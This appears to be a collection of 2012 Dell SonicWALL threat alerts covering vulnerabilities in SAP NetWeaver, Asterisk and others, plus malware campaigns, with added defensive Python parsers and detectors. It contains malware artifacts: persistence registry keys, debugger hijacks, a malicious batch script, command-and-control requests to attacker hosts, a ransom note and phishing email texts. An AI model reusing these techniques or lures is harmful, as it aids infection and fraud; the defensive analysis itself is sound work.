SAP NetWeaver Buffer Overflow (June 1, 2012)

SAP NetWeaver is a software framework that provides the foundation for applications in SAP’s Business Suite. It includes development and runtime environments for SAP and custom applications. NetWeaver uses the ABAP programming language developed by SAP. It is specifically designed to cater to business application development. NetWeaver uses industry standards allowing it to be integrated with other programming frameworks such as dotNET and Java.

Upon installation, NetWeaver starts multiple services and processes to handle incoming network requests. One such process is the Dispatcher, which manages requests sent in by users and handles different types of transactions. One of the transaction types handled is the Diagnostic transaction. This transaction requires an initial connection setup message followed by the request itself. Network communication uses a proprietary SAP protocol which is not publicly documented.

The Diagnostic transaction request, denoted by a specific code, includes a field containing a NULL terminated string. The following table illustrates the diagnostic transaction request structure:

      Offset     Bytes   Description
      ------     -----   ------------
      0x0000     4       length
      0x0004     8       unknown
      0x000C     9       unknown
      0x0015     3       message code
      0x0018     2       unknown
      0x001A     ?       string

A buffer overflow vulnerability exists in SAP NetWeaver’s Dispatcher process due to an error during handling of certain Diagnostic request messages. Specifically, upon receiving a request, the vulnerable code fails to validate the length of a string contained in the message. The string is expanded to Unicode and copied into a stack buffer of a fixed size, without validation of the string length. This can result in a stack buffer overflow, corrupting the stack and overwriting important data such as function variables and return addresses.

A remote, unauthenticated attacker can leverage this vulnerability by sending a Diagnostic request with an overly large string to the vulnerable service. Successful exploitation would allow execution of arbitrary code in the security context of the service. If an exploitation attempt fails, the server may terminate abnormally.
The risk of this vulnerability is mitigated by a required non-default service configuration.
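As an added example (not SAP's or SonicWALL's code), the following Python parser splits a Diagnostic request into the fields of the table above and flags a string whose UTF-16 expansion would exceed a fixed buffer budget, which is the check the vulnerable code omits. The byte order of the length field, the message code value and the 256-byte budget are assumptions; the page does not give them, and the string is assumed to be single-byte encoded before widening.

```python
import struct

STRING_OFFSET = 0x1A        # offset of the string field, from the table above
BUFFER_BUDGET = 256         # assumed fixed buffer size in bytes (not given on the page)


class MalformedRequest(ValueError):
    """Raised when a request does not match the documented layout."""


def parse_diag_request(data: bytes) -> dict:
    """Split a Diagnostic request into the fields listed in the table.

    Field offsets and widths follow the table; the three 'unknown' fields are
    returned as raw bytes. The length field is assumed to be big-endian.
    """
    if len(data) < STRING_OFFSET:
        raise MalformedRequest("header too short: %d bytes" % len(data))
    rest = data[STRING_OFFSET:]
    nul = rest.find(b"\x00")
    if nul < 0:
        raise MalformedRequest("string field is not NULL terminated")
    return {
        "length": struct.unpack(">I", data[0x00:0x04])[0],
        "unknown1": data[0x04:0x0C],
        "unknown2": data[0x0C:0x15],
        "code": data[0x15:0x18],
        "unknown3": data[0x18:0x1A],
        "string": rest[:nul],
    }


def utf16_size(req: dict) -> int:
    """Bytes the string occupies once widened to UTF-16, terminator included
    (each single-byte character and the NULL become two bytes)."""
    return (len(req["string"]) + 1) * 2


def oversized_string(req: dict, budget: int = BUFFER_BUDGET) -> bool:
    """True when copying the widened string into a `budget`-byte buffer would overflow.
    This is the validation the vulnerable Dispatcher code lacks."""
    return utf16_size(req) > budget


def encode_diag_request(code: bytes, text: bytes) -> bytes:
    """Build a request with the documented layout; used here only to construct
    samples for testing the parser. Unknown fields are zero-filled and the
    length field is assumed to count the bytes that follow it."""
    if len(code) != 3:
        raise ValueError("message code is 3 bytes")
    body = bytes(8) + bytes(9) + code + bytes(2) + text + b"\x00"
    return struct.pack(">I", len(body)) + body
```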

Dell SonicWALL has released an IPS signature to address this issue. The following signature was released:

  • 7917 – SAP NetWeaver Dispatcher Buffer Overflow Attempt

This vulnerability has been assigned CVE-2012-2611 by mitre.

IBM Rational ClearQuest ActiveX Buffer Overflow (May 25, 2012)

IBM Rational ClearQuest is a change management system that tracks and manages software changes across a project. It provides change tracking, process automation, reporting and lifecycle traceability for better visibility and control of the software development lifecycle. It supports multiple operating systems, including AIX, HP-UX, Linux, Solaris (Sun Microsystems) and the Windows family.

IBM Rational ClearQuest supports connections to various data sources, for example the Rational ClearQuest database. The CQOle ActiveX control in cqole.dll in IBM Rational ClearQuest can be used by a web user to connect to the database. The CQOle ActiveX control provides multiple API methods for users to access the database.

A heap-based buffer overflow exists in the Ole API of the CQOle ActiveX control in cqole.dll in vulnerable versions of IBM Rational ClearQuest. The vulnerability is due to insufficient validation of user-supplied data, which can cause memory beyond the intended buffer to be overwritten.

The Dell SonicWALL UTM team has researched this vulnerability and created the following IPS signature to detect attacks targeting this issue.

  • 7849 IBM Rational ClearQuest CQOle ActiveX Heap Buffer Overflow

This vulnerability has been assigned CVE-2012-0708.

New German Ransomware (May 25, 2012)

The Dell SonicWALL Threats Research team discovered a new German Ransomware Trojan being spammed in the wild. The spammed e-mail contains a fake premium membership order confirmation from a partner agency and tells the user to open the attachment for the elite account cancellation policy details. The attachment contains the new Ransomware Trojan. A sample e-mail message is shown below:

Translated e-mail: (Credit: Google Translate)

Attachment: Registration.zip
Subject: Your partner agency order (UserName) No. 809119652
Body:

Thank you for your trust (UserName)

You have just ordered www.Meinestadt.ch at the partner agency, the premium membership. The amount of 557.19 EUR is amortized over the next days of your account. The move made by Lugyment AG.

You are now ready for the next 6 months premium member and can use the full size premium options. Please refrain from using the contract information of the supplement, it also contains the invoice data and elite service benefits. If you no longer want the Elite membership, please email the withdrawal, with the attached in the Appendix, attached cancellation policy.

(UserName), we wish you good luck!

Sincerely, Mary Moeller
Support Team

The attached zip file contains the new Ransomware Trojan with an icon disguised as an MS-DOS shortcut file:

If the user opens the file, it will perform the following activities on the victim’s machine:

  • It drops multiple copies of itself as:
    • (Application Data)\(Random foldername)\(Random alphanumeric 20 characters).exe
    • (Windows System)\(Random alphanumeric 20 characters).exe
  • Creates a new instance of the system program ctfmon.exe and injects it with the malicious code.
  • It modifies the Windows registry to ensure that the dropped copies get executed on system reboot and also disables some system tools:
    • HKU\(USERID)\Software\Microsoft\Windows\CurrentVersion\Run\8A54A84: “(Application Data)\Jvreanqxgf\16E41E5F08A54A8497CF.exe”
    • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit: “C:\WINDOWS\system32\userinit.exe ,C:\WINDOWS\system32\D268837808A54A8476D4.exe,”
    • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegedit: 0x00000001
    • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableTaskMgr: 0x00000001
    • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger: “P9KDMF.EXE”
    • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger: “P9KDMF.EXE”
    • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger: “P9KDMF.EXE”
  • Disables Windows Safe Mode by deleting the relevant registry keys.
  • It communicates with a remote server hosted in Beijing, China to register the infection and receive further instructions. The communication data between the malware and control server is encrypted. Below are some of the requests that we saw in our analysis:

  • Complete list of control server URLs that we found in the code analysis:

  • Complete list of commands that the server can send based on our code analysis:
    • IMAGES
    • GEO
    • LOCK
    • UNLOCK
    • URLS
    • EXECUTE
    • KILL
    • UPGRADE
    • UPGRADEURL
    • LOAD
    • WAIT
    • MESSAGE
  • The first GET request causes the control server to return a Microsoft CAB file containing images that will be displayed by the Ransomware when it locks the system:

  • The second GET request fetches the Ransomware message in German from the control server.

    Translated Message (Credit: Google Translate)

    Ladies and Gentlemen,
    apparently the update program has been completely disrupted. Now the virus can only be removed manually. This you need to use your files to. So if you need the locked data, please send us 200 euros Ukash code to the email: security-center@inbox.lt so soon, this code has been tested, you will receive an update program. If you need your data, we strongly advise you to reformat your computer to completely remove the virus. Ukash can be purchased at any gas station and in several Internet cafes in your area.
    mfG Your Security Team

  • The Ransomware will lock the system with the following image once it receives the LOCK command from the control server asking the user to pay 200 euros:

Dell SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Ransom.GA (Trojan)

New Bitcoin miner Trojan spotted in the wild (May 18, 2012)

The SonicWALL UTM research team received reports of a new Bitcoin Miner Trojan in the wild. Bitcoin is a decentralized peer-to-peer crypto-currency. This kind of malware has been covered in a previous sonicalert but has recently become more and more prevalent as attackers recognise it as an easy and effective way to generate and transfer currency without being caught.

The Trojan [Detected as GAV: CoinMiner.I_3 (Trojan)] uses the following icon:

The Trojan makes the following DNS request:

The Trojan adds the following keys to the Windows registry to enable startup after reboot:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run adobeupdate “”%AppData%\8 8\l3.lnk””
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run adobeupdater “”%AppData%\8 8\rundll32.exe””

The Trojan adds the following files to the filesystem:

  • %AppData%\8 8\API.class
  • %AppData%\8 8\API.java
  • %AppData%\8 8\bat.bat
  • %AppData%\8 8\bt.lnk [points to bat.bat]
  • %AppData%\8 8\diablo120328.cl
  • %AppData%\8 8\diakgcn120427.cl
  • %AppData%\8 8\l3.lnk [points to svchost.exe]
  • %AppData%\8 8\libcurl-4.dll
  • %AppData%\8 8\libpdcurses.dll
  • %AppData%\8 8\libusb-1.0.dll
  • %AppData%\8 8\miner.php
  • %AppData%\8 8\OpenCL.dll [for GPU features]
  • %AppData%\8 8\phatk120223.cl
  • %AppData%\8 8\poclbm120327.cl
  • %AppData%\8 8\pthreadGC2.dll
  • %AppData%\8 8\rundll32.exe [An application called StealthRunner]
  • %AppData%\8 8\settings.txt [Used by rundll32.exe (StealthRunner)]
  • %AppData%\8 8\svchost.exe [Detected as GAV: Ainslot.AA_12 (Trojan)]
  • %AppData%\8 8\svchost2.exe [Detected as GAV: Ainslot.AA_12 (Trojan)]

rundll32.exe is an application called StealthRunner that is written by a user on the bitcointalk.org forum. It uses the following icon:

svchost.exe and svchost2.exe use the following icons:

bat.bat contains the following text:

      @echo off
      %windir%\system32\taskkill.exe /im svchost.exe
      %windir%\system32\taskkill.exe /im rundll32.exe
      %windir%\system32\taskkill.exe /im svchost2.exe
      %windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v adobeupdate /d ""%appdata%\3 4\l3.lnk"" /f
      %windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v adobeupdater /d ""%appdata%\3 4\rundll32.exe"" /f

settings.txt contains the bitcoin mining account data of the attacker:

      svchost2.exe -o http://eu.triplemining.com:8344 -u klazim2000_3 -p 7747 [commandline for miner]
      3
      0

The Trojan was observed communicating with the mining server:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: CoinMiner.I_3 (Trojan)
  • GAV: Ainslot.AA_12 (Trojan)

Microsoft Security Bulletin Coverage (May 8, 2012)

SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of May, 2012. A list of issues reported, along with SonicWALL coverage information follows:

MS12-029 Vulnerability in Microsoft Word Could Allow Remote Code Execution (2680352)

  • CVE-2012-0183 RTF Mismatch Vulnerability
    GAV: 18584 – Malformed-File rtf.MP.2

MS12-030 Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2663830)

  • CVE-2012-0141 Excel File Format Memory Corruption Vulnerability
    GAV: 18668 – Malformed-File xls.MP.9
  • CVE-2012-0142 Excel File Format Memory Corruption in OBJECTLINK Record Vulnerability
    GAV: 18672 – Malformed-File xls.MP.10
  • CVE-2012-0143 Excel Memory Corruption Using Various Modified Bytes Vulnerability
    GAV: 18675 – Malformed-File xls.MP.11
  • CVE-2012-0184 Excel SXLI Record Memory Corruption Vulnerability
    GAV: 18676 – Malformed-File xls.MP.12
  • CVE-2012-0185 Excel MergeCells Record Heap Overflow Vulnerability
    GAV: 18677 – Malformed-File xls.MP.13
  • CVE-2012-1847 Excel Series Record Parsing Type Mismatch Could Result in Remote Code Execution Vulnerability
    GAV: 18678 – Malformed-File xls.MP.14
    GAV: 18679 – Malformed-File xls.MP.15

MS12-031 Vulnerability in Microsoft Visio Viewer 2010 Could Allow Remote Code Execution (2597981)

  • CVE-2012-0018 VSD File Format Memory Corruption Vulnerability
    GAV: 18603 – Malformed-File vsd.MP.1

MS12-032 Vulnerability in TCP/IP Could Allow Elevation of Privilege (2688338)

  • CVE-2012-0174 Windows Firewall Bypass Vulnerability
    There is no feasible method of detection at gateway level.
  • CVE-2012-0179 TCP/IP Double Free Vulnerability
    This is a local vulnerability.

MS12-033 Vulnerability in Windows Partition Manager Could Allow Elevation of Privilege (2690533)

  • CVE-2012-0178 Plug and Play (PnP) Configuration Manager Vulnerability
    This is a local vulnerability.

MS12-034 Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight (2681578)

  • CVE-2011-3402 TrueType Font Parsing Vulnerability
    GAV: 18600 – Malformed-File ttf.MP.1
  • CVE-2011-0159 TrueType Font Parsing Vulnerability
    GAV: 18601 – Malformed-File ttf.MP.2
  • CVE-2012-0162 .NET Framework Buffer Allocation Vulnerability
    GAV: 18521 – Malformed-File exe.MP.3
  • CVE-2012-0164 .NET Framework Index Comparison Vulnerability
    There is no feasible method of detection.
  • CVE-2012-0165 GDI+ Record Type Vulnerability
    GAV: 18516 – Malformed-File emf.MP.3
    GAV: 18680 – Malformed-File xls.MP.16
  • CVE-2012-0167 GDI+ Heap Overflow Vulnerability
    GAV: 18510 – Malformed-File emf.MP.1
    GAV: 18514 – Malformed-File emf.MP.2
  • CVE-2012-0176 Silverlight Double-Free Vulnerability
    There is no feasible method of detection.
  • CVE-2012-0180 Windows and Messages Vulnerability
    This is a local vulnerability.
  • CVE-2012-0181 Keyboard Layout File Vulnerability
    This is a local vulnerability.
  • CVE-2012-1848 Scrollbar Calculation Vulnerability
    This is a local vulnerability.

MS12-035 Vulnerabilities in .NET Framework Could Allow Remote Code Execution (2693777)

  • CVE-2012-0160 .NET Framework Serialization Vulnerability
    This is a local vulnerability.
  • CVE-2012-0161 .NET Framework Serialization Vulnerability
    GAV: 18522 – Malformed-File exe.MP.4

Digium Asterisk Manager Command Execution (May 17, 2012)

Asterisk is a software implementation of a telephone private branch exchange (PBX). Like any PBX, it allows attached telephones to make calls to one another, and to connect to other telephone services including the public switched telephone network (PSTN) and Voice over Internet Protocol (VoIP) services. Asterisk is released under a dual license model, using the GNU General Public License (GPL) as a free software license and a proprietary software license to permit licensees to distribute proprietary, unpublished system components.

Asterisk supports a wide range of video and Voice over IP protocols, including the Session Initiation Protocol (SIP), the Media Gateway Control Protocol (MGCP), and H.323. Asterisk can interoperate with most SIP telephones, acting both as registrar and as a gateway between IP phones and the PSTN.

The Asterisk Manager Interface (AMI) protocol is a very simple protocol that allows you to communicate with and manage your Asterisk server almost completely. AMI allows a client program to connect to an Asterisk instance and issue commands or read events over a TCP/IP stream. AMI defines three kinds of packets:

  • Actions: This kind of packet is what the client sends. Only the client can generate Actions.
  • Responses: Actions have at least one Response, indicating the result of the executed (or requested) action.
  • Events: There are two kinds of events: the ones attached to a particular response for a particular action, and the ones that Asterisk generates to inform the connected client about things that are happening in the server (such as call events, changes in variable values, agents and other clients that connect to or disconnect from the server, etc.).

A typical action is the Login action, which looks like this ([CRLF] represents the carriage return and new line characters):

      Action: Login[CRLF]
      Username: admin[CRLF]
      Secret: mysecret[CRLF]
      ActionId: 1a2b[CRLF]
      [CRLF]
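As an added example (not Digium's or SonicWALL's code), the following Python encoder and decoder implement the packet framing shown in the Login action above: one `Key: Value` line per field, each CRLF-terminated, with an empty line closing the packet, plus a classifier for the three packet kinds. The `LOGIN` field list reproduces the sample action; the encoder refuses embedded CR/LF so a caller cannot smuggle an extra field into a packet.

```python
CRLF = "\r\n"


def encode_packet(fields):
    """Serialize an ordered list of (key, value) pairs into one AMI packet.

    Keys and values are rejected if they carry CR or LF, since an embedded
    line break would let a caller inject an additional field; a colon in a
    key would break the Key: Value split on the receiving side.
    """
    if not fields:
        raise ValueError("a packet needs at least one field")
    for key, value in fields:
        if any(c in key for c in "\r\n:") or any(c in value for c in "\r\n"):
            raise ValueError("illegal character in field %r" % key)
    return "".join("%s: %s%s" % (k, v, CRLF) for k, v in fields) + CRLF


def decode_stream(buf):
    """Split received text into complete packets.

    Returns (packets, remainder): packets is a list of field lists in arrival
    order, remainder is any trailing partial packet that has not yet reached
    its terminating blank line and must be kept for the next read.
    """
    packets = []
    while True:
        end = buf.find(CRLF + CRLF)
        if end < 0:
            return packets, buf
        raw, buf = buf[:end], buf[end + 2 * len(CRLF):]
        fields = []
        for line in raw.split(CRLF):
            if not line:
                continue                      # tolerate a stray leading blank line
            key, sep, value = line.partition(":")
            if not sep:
                raise ValueError("line without 'Key: Value' form: %r" % line)
            fields.append((key.strip(), value.strip()))
        if fields:
            packets.append(fields)


def packet_kind(fields):
    """Classify a packet by its first key: Action (client), Response or Event (server)."""
    first = fields[0][0] if fields else ""
    return first if first in ("Action", "Response", "Event") else "unknown"


# The Login action from the text, as a field list.
LOGIN = [("Action", "Login"), ("Username", "admin"),
         ("Secret", "mysecret"), ("ActionId", "1a2b")]
```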

A security bypass vulnerability exists in Digium Asterisk. If Asterisk receives a specially crafted action request from a user, it may allow that unauthorized user to execute administrator commands. A remote, authenticated attacker could exploit this vulnerability to compromise a vulnerable Asterisk server.

The Dell SonicWALL UTM team has researched this vulnerability and released the following IPS signature to detect attacks targeting this issue.

  • 7839 Digium Asterisk Manager Interface Remote Command Execution

This vulnerability has been assigned CVE-2012-2414.

Chinese New Year wishes lead to Zbot Trojan (Jan 26, 2012)

The SonicWALL UTM Research team discovered a new variant of the Zbot Trojan being spammed in the wild. This spam campaign exploits the timing of the Chinese New Year. The spammed email contains an attached PDF with wishes for the Chinese New Year along with a link. The link appears to point to the website of the Ministry of Foreign Affairs of the People’s Republic of China but in fact leads to a malicious domain hosting a newer variant of the Zbot Trojan.

The contents of the attached PDF file are shown below:

The contents of the PDF file translate to:

Brother, Happy Dragon year, and I give you my best wishes!
Thank you for sending me your greetings. I feel the warmth inside.
Long time no contact, I’m not sure if you are still working in China?
[MALICIOUS LINK] Chaili

It performs the following activities when executed:

  • It injects code into winlogon.exe and svchost.exe
  • It creates the following files:
    • %windir%\system32\sdra64.exe (Copy of itself) [Detected as GAV: Zbot.DRGN (Trojan)]
    • %windir%\system32\lowsec\local.ds (Encrypted config file)
    • %windir%\system32\lowsec\user.ds (Collected user information)
  • It modifies the created and accessed timestamps of %windir%\system32\sdra64.exe to an older date in 2002 in order to avoid suspicion. It also sets the file’s attributes to read-only and hidden.
  • It downloads an encrypted configuration file from a remote domain:
    • GET /libraries/joomla/spm.bin HTTP/1.1
      The configuration file, when decrypted, was found to contain the remote C&C server, a custom hosts file and a list of banking and e-commerce sites to monitor and intercept credentials from, along with the HTML pages to be injected.
  • It contacts a remote C&C server and uploads scrounged cookies and stolen credentials:
    • POST /tmp_m/hwnehj/gate.php HTTP/1.1
  • It replaces the hosts file in order to prevent AntiVirus updates.
  • It modifies the following registry key to ensure infection on reboot:
    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon:Userinit “%windir%\system32\userinit.exe,%windir%\system32\sdra64.exe,”

This newer Zbot variant has very low AV detection at the time of writing this alert.

SonicWALL Gateway AntiVirus provides protection against this threat with the following signature:

  • GAV: Zbot.DRGN (Trojan)

Million dollar Tax draw spam leads to Banker Trojan (Feb 10, 2012)

The SonicWALL UTM Research team found a new Banking Trojan variant being spammed heavily over the past three days. The spammed e-mail pretends to contain a bank form asking the user to confirm an ACH transfer worth one million dollars. The zipped attachment in the email actually contains a malicious executable file that uses the Right-to-Left Override technique to present itself as a document file.
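The Right-to-Left Override trick described above, as an added example (not SonicWALL's code): a Python check that reports what a user would see in a file manager versus what Windows would actually execute for an attachment name, and filters a list of names down to those carrying bidi control characters. The attachment name is constructed for the example.

```python
import unicodedata

RLO = "\u202e"   # RIGHT-TO-LEFT OVERRIDE, the character the sample abuses
# Other Unicode bidi controls that have no business in a file name.
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}


def displayed_name(name):
    """Approximate how a file manager renders a name containing U+202E: the
    text after the override is drawn right-to-left, i.e. visually reversed,
    so 'x_\u202efdp.exe' shows as 'x_exe.pdf'."""
    if RLO not in name:
        return name
    head, _, tail = name.partition(RLO)
    return head + tail[::-1]


def extension(name):
    """Lower-cased extension of a name, or '' when it has none."""
    parts = name.rsplit(".", 1)
    return parts[1].lower() if len(parts) == 2 else ""


def inspect_name(name):
    """Describe a bidi-control problem in a file name, or return None when the
    name contains no bidi control characters at all."""
    controls = [unicodedata.name(c) for c in name if c in BIDI_CONTROLS]
    if not controls:
        return None
    shown = displayed_name(name)
    return {
        "actual": name,                      # what the OS will open
        "displayed": shown,                  # what the user is shown
        "actual_ext": extension(name),
        "displayed_ext": extension(shown),
        "controls": controls,
    }


def flag_attachments(names):
    """Keep only the attachment names that deserve a closer look."""
    return [r for r in map(inspect_name, names) if r is not None]
```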

The SonicWALL Research team has captured more than 2000 copies of e-mail from this spam campaign in the past 48 hours. Below are some sample messages:

The malicious executable found in the zipped attachments looks like:


Upon execution, it performs the following activities:

  • Drops a copy of itself and runs it:
    • (Application Data)\KB00903122.exe [Detected as GAV: Injector.NYF (Trojan)]
  • Registry modifications:
    • HKU\UserID\Software\Microsoft\Windows Media Center [Uses this key to save the banking site list and script to inject]
    • HKU\UserID\Software\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline: 0x00000000
    • HKU\UserID\Software\Microsoft\Windows\CurrentVersion\Run\KB00903122.exe: “”(Application Data)\KB00903122.exe””
  • Connects to a remote server to send the victim machine’s information and receives a list of banking sites and a script to inject:

      POST /rwx/B1_3n9/in/ HTTP/1.1
      Host: hmvmgywkvayilcwh.ru:8080

SonicWALL Gateway AntiVirus provides proactive protection against this spam campaign via the following signatures:

  • GAV: Injector.NYF (Trojan)
  • GAV: Suspicious#rtol.dc (Trojan)


Hotel Reservation spam campaign leads to Trustezeb Trojan (Feb 17, 2012)

The SonicWALL UTM Research team observed an increase in spam emails using hotel reservation themes. The emails, pretending to be from booking.com, inform the recipient that their hotel reservation has been confirmed and that the reservation information is attached. The zipped attachment in the email is a variant of the Trustezeb Trojan. This Trojan is specifically crafted to target Trusteer’s security products by attaching itself to the execution of some of Trusteer’s processes.

The spam campaign is shown below:


It performs the following activities when executed:

  • It injects code into svchost.exe
  • It creates the following files:
    • %windir%\system32\A37C0BC49C3B4DC6F27C.exe (Copy of itself) [Detected as GAV: Trustezeb.A_2 (Trojan)]
    • Program Files\Trusteer\Rapport\bin\RapportService.exe [Detected as GAV: FakeTruste.A (Trojan)]
    • %windir%\RPService.exe [Detected as GAV: FakeTruste.A (Trojan)]
  • It modifies the following registry entry to ensure infection on reboot:
    • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit: “%windir%\system32\userinit.exe,%windir%\System32\A37C0BC49C3B4DC6F27C.exe,”
  • It creates the following registry entries to add itself as a debugger for Trusteer processes. This ensures it is executed in the execution sequence of these Trusteer products:
    • HKLM\SOFTWARE\Classes\MyEze.1\shell\open\command: “%SystemRoot%\system32\RPService.exe %0 %1 %2”
    • HKLM\SOFTWARE\Classes\MyEze.1\shell\edit\command: “%SystemRoot%\system32\RPService.exe %0 %1 %2”
    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RapportMgmtService.exe Debugger “RPService.exe”
    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RapportService.exe Debugger “RPService.exe”
    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RapportSetup-Full.exe Debugger “RPXService.exe”
    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RapportSetup.exe Debugger “RPXService.exe”
  • The following commands were found during analysis:
    • IMAGES
    • GEO
    • LOCK
    • UNLOCK
    • URLS
    • EXECUTE
    • KILL
    • UPGRADE
    • WAIT
  • It contacts a remote command and control server for further instructions:
    • {removed}/asdfasdgfs/Fiur5sDzx2col.php
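The German ransomware, Zbot and Trustezeb write-ups above all persist through the same handful of registry locations: extra entries in Winlogon\Userinit, Image File Execution Options\<program>\Debugger hijacks, DisableRegedit/DisableTaskMgr policies, and Run values pointing into the user profile. As an added example (not SonicWALL's code), the following Python audit applies those four checks to a list of (key, value name, data) tuples such as one would export from a host; the sample entries are constructed from the values listed above, with a placeholder SID and profile path.

```python
import ntpath

# Constructed sample entries (key, value name, data), modelled on the registry
# changes listed in the write-ups above. SID and profile path are placeholders.
SAMPLE_ENTRIES = [
    (r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Userinit",
     r"C:\WINDOWS\system32\userinit.exe ,C:\WINDOWS\system32\D268837808A54A8476D4.exe,"),
    (r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe",
     "Debugger", "P9KDMF.EXE"),
    (r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RapportService.exe",
     "Debugger", "RPService.exe"),
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system", "DisableTaskMgr", "0x00000001"),
    (r"HKU\S-1-5-21-PLACEHOLDER\Software\Microsoft\Windows\CurrentVersion\Run", "8A54A84",
     r"C:\Documents and Settings\user\Application Data\Jvreanqxgf\16E41E5F08A54A8497CF.exe"),
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "VendorUpdater",
     r"C:\Program Files\Vendor\updater.exe"),   # benign control entry, must not be flagged
]

# Locations a regular installer rarely uses for an autostart binary.
PROFILE_MARKERS = ("\\application data\\", "\\appdata\\", "%appdata%", "\\local settings\\temp\\")
TOOL_POLICIES = ("disableregedit", "disabletaskmgr")


def _as_int(value):
    """Accept an int or a REG_DWORD rendered as text such as '0x00000001'."""
    return value if isinstance(value, int) else int(str(value), 0)


def audit_entries(entries):
    """Return (category, subject, data) findings for the persistence and
    tool-disabling patterns described on this page."""
    findings = []
    for key, name, data in entries:
        k, n, d = key.lower(), name.lower(), str(data)
        if "\\image file execution options\\" in k and n == "debugger":
            # Any Debugger value means the named program is replaced at launch.
            findings.append(("ifeo_debugger", ntpath.basename(key), d))
        elif k.endswith("\\winlogon") and n == "userinit":
            # Userinit is a comma-separated list; only userinit.exe belongs there.
            for item in d.split(","):
                item = item.strip()
                if item and ntpath.basename(item).lower() != "userinit.exe":
                    findings.append(("userinit_extra", item, d))
        elif k.endswith("\\policies\\system") and n in TOOL_POLICIES:
            if _as_int(data) == 1:
                findings.append(("tool_disabled", name, d))
        elif k.endswith("\\run") and any(m in d.lower() for m in PROFILE_MARKERS):
            # Covers both CurrentVersion\Run and Policies\Explorer\Run.
            findings.append(("run_from_profile", name, d))
    return findings
```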

SonicWALL Gateway AntiVirus provides protection against this threat with the following signatures:

  • GAV: Trustezeb.A (Trojan)
  • GAV: Trustezeb.A_2 (Trojan)
  • GAV: FakeTruste.A (Trojan)

FakeAV spam campaign continues with Smart Protection 2012 (Feb 24, 2012)

The SonicWALL UTM research team has observed the continuation of a recent FakeAV spam campaign. The underlying malware used is similar to that of a previous sonicalert. The FakeAV being spammed is named Smart Protection 2012 and uses the usual scare tactics to encourage the user to buy a license to disinfect the system.

The Trojan spreads through an email purported to be from FedEX Services. It requests the user to open and run the attachment that contains the Trojan:

The Trojan uses the following icon to masquerade as a harmless PDF file:

Upon infection, the Trojan makes the following changes to the file system:

It copies itself to:

  • C:\Documents and Settings\{USER}\Application Data\81732E.exe [Detected as GAV: FakeAV.A_4 (Trojan)]

It creates the following files:

  • C:\Documents and Settings\{USER}\Local Settings\temp\311.tmp [Detected as GAV: Winwebsec.AQUR_4 (Trojan)]
  • C:\Documents and Settings\{USER}\Local Settings\temp\312.tmp [Detected as GAV: Winwebsec.AQUR_4 (Trojan)]

It adds the following key to the Windows registry to enable startup after reboot:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run Intel “C:\Documents and Settings\{USER}\Application Data\81732E.exe”

The Trojan makes the following DNS requests:

  • www.google.com
  • tropic18854.ru
  • www.alphonsgunther.com
  • www.m-land.hu
  • www.mercierautos.ca

The Trojan downloads 1.exe from a remote webserver. It saves and runs it as 311.tmp and 312.tmp.

The Trojan was observed sending potentially sensitive encrypted system information to a remote webserver:

The Trojan pops up the following windows upon infection:

The Trojan will display fake infection results:

If the “Remove all threats now” button is pressed it will display the following payment page:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: FakeAV.A_4 (Trojan)
  • GAV: Winwebsec.AQUR_4 (Trojan)